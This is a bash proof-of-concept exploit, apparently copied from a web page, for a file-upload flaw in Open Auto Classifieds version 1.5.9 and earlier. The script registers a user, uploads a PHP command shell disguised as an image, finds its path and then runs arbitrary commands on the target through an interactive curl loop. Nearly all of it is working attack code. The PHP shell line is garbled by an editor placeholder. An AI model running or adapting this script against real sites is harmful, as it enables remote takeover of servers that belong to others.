|
#!/bin/bash
# File Upload exploit for Open Auto Classifieds version <= 1.5.9
#
# Researched by Andrew Horton (urbanadventurer)
# (c) MorningStar Security, 2009 http://www.morningstarsecurity.com/
if [ -z "$1" ]; then
echo "Usage: $0 <target-url>"
echo "File upload proof of concept exploit for Open Auto Classifieds <= v 1.5.9"
echo "This will create a user with the name 'hacker' and pass '31337' then upload a command execution shell."
echo -e "eg. $0 http://www.myweb.com/cardealer/\n"
exit
fi
target="$1"
echo "<? print passthru(\___FCKpd___0
REQUEST['cmd']); ?>" > evilimage.jpg.php
echo "Registering user"
curl -c cookiejar -d "user=hacker&pass=31337&email=foo%40bar.com&company_name=&first_name=Hack&last_name=Errr&phone=123+123+1234&alt_phone=&fax=&country=1&state=Badakhshan&city=&address=&zip=&submit=Submit&agree=agree" "$target/register.php" >/dev/null 2>&1
echo "Login"
curl -b cookiejar -c cookiejar -d "user=hacker&pass=31337&submit=Login" "$target/login.php" >/dev/null 2>&1
echo "Upload command shell as user image"
curl -b cookiejar -c cookiejar -F "image=@evilimage.jpg.php" -F "max=524288" -F "addimage=Submit" "$target/useredit.php" >/dev/null 2>&1
CODE=`curl -b cookiejar -c cookiejar "$target/member.php" 2>/dev/null | grep _thumb.jpg | egrep -o "[0-9]{4}"`
rm -f cookiejar evilimage.jpg.php
echo "Command shell found at : $target/images/users/hacker${CODE}evilimage.jpg.php?cmd=id"
curl "$target/images/users/hacker${CODE}evilimage.jpg.php?cmd=id" 2>/dev/null
while read cmd; do
curl -d "cmd=$cmd" "$target/images/users/hacker${CODE}evilimage.jpg.php" 2>/dev/null
done
|
推荐
评论(0条)
